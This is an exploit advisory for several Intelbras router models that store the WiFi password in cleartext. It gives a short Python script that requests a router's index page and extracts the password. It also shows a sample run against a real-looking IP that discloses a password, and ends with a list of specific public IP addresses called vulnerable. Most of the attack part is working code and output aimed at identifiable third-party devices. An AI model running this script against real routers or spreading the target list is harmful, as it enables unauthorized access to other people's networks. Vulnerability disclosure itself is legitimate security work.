Title: Intelbras Roteadores – Remote WiFi Password Disclosure
Date: 2020-02-09
Author: Nir Yehoshua 
Vendor Homepage: http://intelbras.com.br/
Vulnerable Routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim.


Details:

The following routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim from Intelbras (Brazilian company) are saving the password in cleartext without any encryption/hashing algorithm.
An attacker can send an HTTP request to the router and get the password.


####################

Python code:


import requests

print 'Remote WiFi Password disclosure, Please enter the victim address: (Use http / https://<IP>:PORT/index.asp)'
user_input = raw_input("> ")
checker = requests.get(user_input)

if 'def_wirelesspassword' in checker.content: # The password variable
    print "Vulnerable"
    details =  checker.content.split("def_wirelesspassword")[1].split('\n')[0].replace('= "','').replace('";','') # Quick and dirty split method
    print 'wifi password is:',details
else:
    print "Not Vulnerable"
    exit()

Example usage:
Remote WiFi Password disclosure, Please enter the victim address: (Use http / Https://<IP>:PORT/index.asp)
> http://77.70.110.152:8080/index.asp
Vulnerable
wifi password is:  0896676565

####################

List of vulnerable devices:
45.162.145.38:80
45.191.10.242:8080
45.228.114.23:8080
168.194.158.224:8888
177.101.3.136:8080

And more than 1,500 over the globe.